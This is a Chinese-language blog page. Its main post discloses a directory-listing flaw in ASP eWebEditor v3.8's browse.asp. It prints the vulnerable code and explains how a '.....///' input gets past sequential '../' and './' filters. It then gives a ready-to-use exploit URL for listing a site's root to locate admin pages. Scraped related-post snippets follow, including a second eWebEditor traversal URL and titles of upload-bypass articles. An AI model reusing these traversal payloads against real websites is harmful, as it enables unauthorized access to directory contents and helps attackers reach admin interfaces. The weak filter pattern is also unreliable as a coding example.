好久没发洞了,今天搞个站遇到了asp eWebEditor v3.8  随便挖掘了下,下面是成果,getshell的是没有,小洞还是发现了个!标题:asp eWebEditor v3.8 列目录漏洞(其他版本为测试)漏洞文件:asp/browse.asp漏洞发生者:鬼哥漏洞产生:Sub InitParam()

sType = UCase(Trim(Request.QueryString("type")))

sStyleName = Trim(Request.QueryString("style"))

sCusDir = Trim(Request.QueryString("cusdir"))

Dim i, aStyleConfig, bValidStyle

bValidStyle = False

For i = 1 To Ubound(aStyle)

aStyleConfig = Split(aStyle(i), "|||")

If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then

bValidStyle = True

Exit For

End If

Next

If bValidStyle = False Then

OutScript("alert('Invalid Style.')")

End If

sBaseUrl = aStyleConfig(19)

nAllowBrowse = CLng(aStyleConfig(43))

nCusDirFlag = Clng(aStyleConfig(61))

If nAllowBrowse <> 1 Then

OutScript("alert('Do not allow browse!')")

End If

If nCusDirFlag <> 1 Then

sCusDir = ""

Else

sCusDir = Replace(sCusDir, "\", "/")

If Left(sCusDir, 1) = "/" Or Left(sCusDir, 1) = "." Or Right(sCusDir, 1) = "." Or InStr(sCusDir, "./") > 0 Or InStr(sCusDir, "/.") > 0 Or InStr(sCusDir, "//") > 0 Then

sCusDir = ""

Else

If Right(sCusDir, 1) <> "/" Then

sCusDir = sCusDir & "/"

End If

End If

End If

sUploadDir = aStyleConfig(3)

If Left(sUploadDir, 1) <> "/" Then

sUploadDir = "../" & sUploadDir

End If

Select Case sBaseUrl

Case "0"

sContentPath = aStyleConfig(23)

Case "1"

sContentPath = RelativePath2RootPath(sUploadDir)

Case "2"

sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))

End Select

sUploadDir = sUploadDir & sCusDir

sContentPath = sContentPath & sCusDir

Select Case sType

Case "FILE"

sAllowExt = ""

Case "MEDIA"

sAllowExt = "rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov"

Case "FLASH"

sAllowExt = "swf"

Case Else

sAllowExt = "bmp|jpg|jpeg|png|gif"

End Select

sCurrDir = sUploadDir

sDir = Trim(Request("dir"))

'1.假设dir= ../

'2.假设dir=...//

'3.假设dir=.....///

sDir = Replace(sDir, "\", "/")  '过滤1

sDir = Replace(sDir, "../", "") '过滤2

'1.到这里就被过滤了

sDir = Replace(sDir, "./", "") '过滤3

'2到这里也被功率了

'3到这里就成../了。比较有趣的饶过!好象不少cms这样过滤过。[/color]

If sDir <> "" Then

If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then

sCurrDir = sUploadDir & sDir & "/"

Else

sDir = ""

End If

End If

End Sub

漏洞测试EXP:http://www.8090sec.com/asp/browses.asp?style=gray&dir=.....///.....//  饶过过滤直接列根目录(只能列图片已目录)可用于找后台等(利用exp在页面不会显示出目录来,得查看源文件).鬼哥:我也不知道这个漏洞别人发现或者公布没,反正我在网上找了下没找到 asp eWebEditor v3.8的这个漏洞,,确实有php版的漏洞,但是asp的确实没。转载请著名作者名“鬼哥”否则没JJ。

ewebeditor 3.8php漏洞,asp eWebEditor v3.8 列目录漏洞相关推荐

  1. ewebeditor 5.2 列目录漏洞

    利用方法如下 http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=-././/.. 由于st0p测试的时候, ...

  2. 审查元素上传php,KindEditor上传解析漏洞/列目录/内容漏洞_PHP教程

    本文章来给大家介绍一下关于KindEditor上传解析漏洞/列目录/内容漏洞分析,有需要的朋友快速补上吧. Kindeditor漏洞 编辑代码内容被执行 kindeditor漏洞描述:在kindedi ...

  3. ewebeditor漏洞,ewebeditor漏洞攻击

    ewebeditor漏洞,ewebeditor漏洞攻击      先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1.首先访问默认管理页看是否存在.         默认管理页地址 ...

  4. 97php.com,360webscan字典 网站检测 目录漏洞扫描

    360webscan字典 360webscan字典 委内瑞拉数据泄露 /$ /%20..%5Cweb-inf /%22%3E%3CsCrIpT%3Eprompt(42873) /%252e%252e% ...

  5. nginx 上传文件漏洞_文件上传及解析漏洞

    注:本文仅供学习参考 文件上传定义: 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等. 这种攻击方式是最为直接和有效的, ...

  6. nginx 上传文件漏洞_浅谈文件上传漏洞(其他方式绕过总结)

    前言 上一篇文章简单的介绍了绕过客户端检测,现在总结一下其他方式绕过. 正文 1.1 服务端MIME类型检测绕过 检测原理:用户上传文件时,服务器会获取这个文件的MIME值,与事先设置好的进行比对,如 ...

  7. wordpress php执行短代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)

    1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常 ...

  8. struts2漏洞监测_Apache Shiro身份验证绕过漏洞风险提示

    漏洞公告 2020年8月17日,安恒应急响应中心监测发现Apache Shiro官方更新发布了1.6.0之前版本存在身份验证绕过的漏洞公告,对应CVE编号:CVE-2020-13933,相关链接: h ...

  9. 【安全漏洞】Rocket.Chat 远程命令执行漏洞分析

    简述 Rocket.Chat 是一个开源的完全可定制的通信平台,由 Javascript 开发,适用于具有高标准数据保护的组织. 2021年3月19日,该漏洞在 HackerOne 被提出,于2021 ...

  10. android fastjson漏洞_【漏洞预警】Fastjson 远程代码执行漏洞(暂无PoC)

    Fastjson简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库.它采用一种"假定有序快速匹配"的算法,把JSON Parse的性能提升到极致,是目前Jav ...

最新文章

  1. POJ 1028: Web Navigation
  2. ALV的SAP自带标准程序实例
  3. SSM-SpringMVC-07:SpringMVC中处理器映射器
  4. MySql随笔part3 表操作
  5. Spring Boot Framework的关键组件和内部构造(自动装配、起步依赖、CLI、Actuator)
  6. Spring Boot学习总结(8)——SpringBoot Common application properties(application.properties)详解
  7. oracle asm 加盘,ASM添加磁盘最佳实践
  8. Java正则表达式【详解】
  9. bios 微星click_微星发表全新搭载图形化『Click BIOS』主机板 采用最新UEFI架构 迎接全图形化BIOS调教新时代...
  10. 【好文】敏捷中国十八年目睹之怪现状
  11. STM32F4 CAN总线通信资料参考,提供源码参考快速上手CAN总线通信
  12. 区块链开发中使用最流行的编程语言
  13. 3.HTML段落、文本格式化、链接
  14. npm install 连接不上github解决办法
  15. 4. “随机漫步的傻瓜--纳西姆.尼古拉斯.塔勒布”读后感
  16. Google Instant Apps
  17. 架构设计:系统存储(16)——Redis事件订阅和持久化存储
  18. 用户协议栈之协议设计
  19. 链叨叨直播间丨CryptoMechaKing——末世机甲“元宇宙游戏”来临
  20. 毕业旅行~丽江、玉龙雪山、泸沽湖、丽江古城(2019)

热门文章

  1. 2021最新域名授权系统网站源码 全新一键安装源码+卡密自助授权+全新UI界面
  2. 回复git@vger.kernel.org的注意事项
  3. AlphAction编译不通过问题:error: command ‘:/home/yst/cudas/cuda-10.0/bin/nvcc‘ failed with exit status 1
  4. Java岗史上最全八股文面试真题汇总,堪称2022年面试天花板
  5. 使用BOOTICE 恢复系统启动项
  6. Python爬取新东方在线网站大学英语六级词汇
  7. 大白菜u盘装win10步骤图解
  8. 除了QQ就是一塌糊涂的日子不会再有了
  9. Flink1.12-2021黑马 8 Flink高级特性和新特性
  10. 时空超分辨论文阅读笔记(一)---- Zooming Slow-Mo